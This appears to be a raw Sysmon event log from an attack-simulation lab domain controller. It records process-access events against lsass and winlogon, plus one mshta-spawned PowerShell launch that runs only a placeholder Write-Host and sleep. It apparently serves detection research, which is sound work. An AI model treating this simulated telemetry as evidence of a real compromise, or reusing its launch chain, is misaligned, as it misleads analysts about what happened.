15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025226Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025646Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.866{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025645Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.866{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025644Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.819{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025643Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.819{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000025642Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.788{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_wpbaojie.gmo.ps12021-01-20 15:59:31.788 10341000x800000000000000025641Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.772{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025640Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.725{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5363-6008-5E06-00000000A301}7124C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025639Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.725{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5363-6008-5E06-00000000A301}7124C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025638Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.725{7901BC46-5363-6008-5E06-00000000A301}71247924C:\Windows\system32\conhost.exe{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025637Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.710{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5363-6008-5E06-00000000A301}7124C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025636Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.710{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025635Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.710{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025634Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.710{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025633Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.710{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025632Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.710{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025631Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.710{7901BC46-5363-6008-5C06-00000000A301}40847712C:\Windows\System32\mshta.exe{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000025630Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.720{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exeC:\Windows\System32\mshta.exe -Embedding 10341000x800000000000000025629Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.678{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025628Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.678{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025627Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.678{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025626Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.678{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025625Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.663{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025624Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.663{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025623Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.663{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025622Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.647{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025621Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.647{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025620Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.647{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025619Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.647{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025618Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 